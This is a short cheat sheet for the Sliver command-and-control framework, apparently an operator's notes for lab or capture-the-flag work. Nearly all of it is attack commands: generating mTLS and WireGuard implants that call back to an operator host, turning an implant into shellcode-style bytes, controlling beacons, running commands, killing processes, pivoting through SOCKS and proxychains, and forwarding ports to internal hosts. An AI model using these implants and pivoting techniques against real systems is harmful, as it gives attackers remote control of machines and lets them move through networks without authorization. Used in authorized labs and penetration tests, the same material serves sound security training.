% sliver

# generate profile
profiles new --mtls 10.10.14.60:443 --skip-symbols --format exe --arch amd64 --os linux lin64mtls_exe

# generate wireguard implant
generate --wg <tun0> --format exe
wg
xxd -p <FILE> | sed 's/\(..\)/\\x\1/g' | tr -d '\n'

# interact/use beacon
use <BEACON_ID>

# rename beacon
rename -n <NEW_NAME>

# get privilege integrity
getprivs

# execute with output
execute -o <CMD>

# kill process
terminate <PID>

# exit shell
ctrl+d

# pivot via socks
interactive
socks5 start

# change interval jitter
reconfig -i 1m -j 5s

# wireguard socks
generate --wg <tun0_ip> --format exe
wg-config --save <FILENAME>.conf
vim <FILENAME>.conf
...
Endpoint = <tun0_ip>:53
wg
(IN ZSH): wg-quick up <PWD>/wg.conf
wg-socks start
sudo vim /etc/proxychains.conf
...
socks5 SLIVER_SOCKS_SERVER_IP 3090

# port forward
portfwd add --remote 172.16.1.13:80
[*] Port forwarding 127.0.0.1:8080 -> 172.16.1.13:80

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
